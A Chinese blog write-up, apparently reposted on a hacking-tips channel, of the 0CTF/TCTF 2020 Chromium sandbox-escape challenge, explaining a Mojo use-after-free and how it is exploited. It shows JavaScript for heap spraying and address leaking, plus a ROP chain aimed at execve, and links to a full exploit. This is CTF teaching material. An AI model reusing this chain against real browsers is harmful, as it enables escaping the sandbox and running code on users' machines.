2020年9月30日13:53:51评论586 views字数 3227阅读10分45秒阅读模式

点击上方“蓝字”，学习更多hacker小技巧！

初探Chrome沙箱逃逸

Background

Chrome Security Architecture

众所周知沙箱是Chrome重要的安全机制，有沙箱就意味着v8、音视频解码等等渲染层的漏洞不能直接打到host上，所以我们想要pwn Chrome至少要两个漏洞，沙箱进程的rce和沙箱逃逸。

Chrome安全架构如下

初探Chrome沙箱逃逸

Mojo

Mojo是Chrome新的IPC机制，从Mojo文档中可以看到，Mojo is a collection of runtime libraries providing a platform-agnostic abstraction of common IPC primitives, a message IDL format, and a bindings library with code generation for multiple target languages to facilitate convenient message passing across arbitrary inter- and intra-process boundaries. 目前来看无论是CTF还是Real World中，利用Mojo进行Chrome沙箱逃逸都很常见。

0CTF/TCTF2020 Quals ChromiumSBX

来看这个例子。这是0ctf/tctf 2020 quals的一道浏览器题，通过diff可以看到增加了一个新的mojo service，代码很好理解，是一个storage service。

漏洞点

通过审计可以发现如下问题：

void TStorageImpl::Init(InitCallback callback) {    inner_db_ = std::make_unique<InnerDbImpl>();    // Init will release the previous inner_db pointer    std::move(callback).Run();}
void TStorageImpl::CreateInstance(CreateInstanceCallback callback) {    mojo::PendingRemote<blink::mojom::TInstance> instance;    mojo::MakeSelfOwnedReceiver(std::make_unique<content::TInstanceImpl>(inner_db_.get()),                                instance.InitWithNewPipeAndPassReceiver());    // so inner_db_.get() pointer obtained previously will be freed    // which is UAF    std::move(callback).Run(std::move(instance));}

TStorageImpl::CreateInstance会使用inner_db_.get()将存储在inner_db_内部的指针传递到TInstanceImpl的构造函数中，新的TInstanceImpl实例会将指针存储到其字段中；但是观察TStorageImpl::Init是可以被多次调用的，每次调用它会把前一个对象释放，但前一个对象已经被TInstanceImpl存储，会造成UAF。

利用思路

1.堆喷占位

漏洞点是一个比较好触发的UAF，首先想到的是去占位，通过调试可以发现InnerDbImpl的大小是0x678，观察一下我们可以控制大小的对象，看到了base::queue<uint64_t> queue_，它是stl的容器，通过push和pop可以控制其大小，具体把大小调整到0x678的方法见成功2019的博客，写的很成功我不啰嗦了。

成功2019的博客：

https://mem2019.github.io/jekyll/update/2020/07/03/TCTF-Chromium-SBX.html

2.泄露堆地址

为了劫持虚表，我们需要泄露堆地址。我们可以用我们占位成功那个对象来泄露UAF对象的base::queue指针。

// tInsPtr here is the UAF objectconst idx = (await tInsPtr.getInt()).value;print(idx); // get which one is occupying the UAF objectfor (let i = 0; i < 201; i++)await tInsPtrSprays[idx].pop();const heapAddr = (await tInsPtrSprays[idx].pop()).value;// pop element to leak the address of heap// now 0x678 is freed again due to poping elementsprint(hex(heapAddr));

3.代码执行：

基本条件都有了，开始构造rop劫持虚表，参考Plaid CTF mojo题的exp：

await tInsPtr.push(libcAddr + 0x52bc8);  // pop rbp; pop rbx; ret;await tInsPtr.push(0);           // let queue to have some elementawait tInsPtr.push(textAddr + 0x3fa5114); // xchg rsp,rax, as virtual tableawait tInsPtr.push(libcAddr + 0x2cb49);  // pop rbx; ret;await tInsPtr.push(libcAddr + 0xe4e30);  // execveawait tInsPtr.push(libcAddr + 0x1b96);  // pop rdx; ret;await tInsPtr.push(0);           // rdx = 0await tInsPtr.push(libcAddr + 0xd1ba7);  // lea rdi, [rsp + 0xb0]; mov rsi, rbp; call rbx

完整exploit

成功2019的exp

https://github.com/Mem2019/Mem2019.github.io/blob/master/codes/T20ChromeSBX.html

Conclusion

上述基本是一道mojo沙箱逃逸的典型例题，手法和思想都比较经典。解题基本参照2019的思路来的，Perfect Blue这里也有很详细的writeup。

Perfect Blue的博客

https://blog.perfect.blue/Chromium-Fullchain

另外关于Mojo还有一个很经典的漏洞是Issue 1062091，后续文章可能会分析。

除了Mojo，Android Binder的CVE-2020-0041，Windows内核的CVE-2020-0981等这种也可以被用来逃逸Chrome沙箱。

参考链接

https://theori.io/research/escaping-chrome-sandbox/

https://mem2019.github.io/jekyll/update/2020/07/03/TCTF-Chromium-SBX.html

https://gist.github.com/ujin5/5b9a2ce2ffaf8f4222fe7381f792cb38

https://docs.google.com/drawings/d/1TuECFL9K7J5q5UePJLC-YH3satvb1RrjLRH-tW_VKeE/edit

END

请严格遵守网络安全法相关条例！此分享主要用于学习，切勿走上违法犯罪的不归路，一切后果自付！

关注此公众号，各种福利领不停，轻轻松松学习hacker技术！

在看你就赞赞我！

扫码关注我们

扫码领hacker资料，常用工具，以及各种福利

初探Chrome沙箱逃逸

转载是一种动力分享是一种美德

左青龙
微信扫一扫

右白虎
微信扫一扫

初探Chrome沙箱逃逸

点击上方“蓝字”，学习更多hacker小技巧！

干货 | 支付金额类漏洞挖掘技巧总结

记一次价格500rmb的短信轰炸

【相关分享】内网信息收集

如何构建自己的自定义 C2 框架

如何使用CsWhispers向C#项目添加DInvoke和间接系统调用方法

深信服防火墙AF策略路由如何配置？

【OSCP】gigachad

CVE-2024-0015复现 (DubheCTF DayDream)

《生成式人工智能服务安全基本要求》原文参阅

网络安全工程师必知的系统敏感目录

发表评论

在线咨询

微信